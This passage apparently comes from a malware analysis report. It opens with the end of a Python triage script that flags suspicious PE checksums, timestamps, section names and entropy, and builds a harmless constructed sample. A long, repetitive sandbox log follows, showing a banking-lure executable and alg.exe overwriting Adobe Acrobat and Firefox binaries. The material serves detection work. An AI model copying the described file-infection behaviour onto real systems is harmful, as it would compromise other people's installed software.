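                         "size": raw_size, "entropy": shannon_entropy(raw)})
    return {"timestamp": timestamp, "checksum": stored,
            "checksum_offset": checksum_off, "sections": sections}

def triage(data, now=None):
    """Return (indicator, detail) pairs; an empty list means nothing fired."""
    info = parse_pe(data)
    now = time.time() if now is None else now
    findings = []
    computed = pe_checksum(data, info["checksum_offset"])
    if info["checksum"] and info["checksum"] != computed:   # 0 means "not set"
        findings.append(("checksum", f"stored 0x{info['checksum']:x}, computed 0x{computed:x}"))
    if info["timestamp"] > now + 86400:
        findings.append(("timestamp", f"0x{info['timestamp']:08X} is in the future"))
    for s in info["sections"]:
        if s["name"] not in KNOWN_SECTIONS:
            findings.append(("section_name", s["name"]))
        if s["entropy"] > ENTROPY_ALERT:
            findings.append(("entropy", f"{s['name']} {s['entropy']:.3f} bits/byte over {s['size']} bytes"))
    return findings

def build_sample_pe(timestamp=0xF67E8745, checksum=0xCD10F, reloc_name=b".reloc"):
    """Constructed two-section PE32, not a real sample: NOP-filled .text plus a
    .reloc of SHA-256 chain output standing in for an encrypted payload. The
    defaults reuse the timestamp and checksum the report shows for alg.exe and
    AppVClient.exe; everything else is made up."""
    text = b"\x90" * 0x200
    reloc, block = b"", b"seed"
    while len(reloc) < 0x1000:
        block = hashlib.sha256(block).digest()
        reloc += block
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, timestamp, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB9I6H4IHH", 0x10B, 14, 0, len(text), len(reloc), 0, 0x1000, 0x1000,
                      0x2000, 0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x4000, 0x200, checksum, 3, 0)
    opt += b"\0" * (224 - len(opt))                               # zeroed data directories
    secs = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", reloc_name, len(reloc), 0x2000, len(reloc), 0x400, 0, 0, 0, 0, 0x42000040)
    headers = dos + b"PE\0\0" + coff + opt + secs
    return headers + b"\0" * (0x200 - len(headers)) + text + reloc

if __name__ == "__main__":
    for kind, detail in triage(build_sample_pe(), now=1_700_000_000):
        print(f"{kind:13}{detail}")
```

Run it against any of the dropped files with triage(open(path, "rb").read()). The constructed sample trips the checksum, timestamp and entropy checks; a variant with a correct checksum and a past timestamp trips only the entropy check. On a live host the decisive test for the Adobe, Chrome and Firefox binaries this report lists as written remains Authenticode validation, since an infected copy no longer matches its embedded signature.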

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (14 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe (8 write events)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe (5 write events shown)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
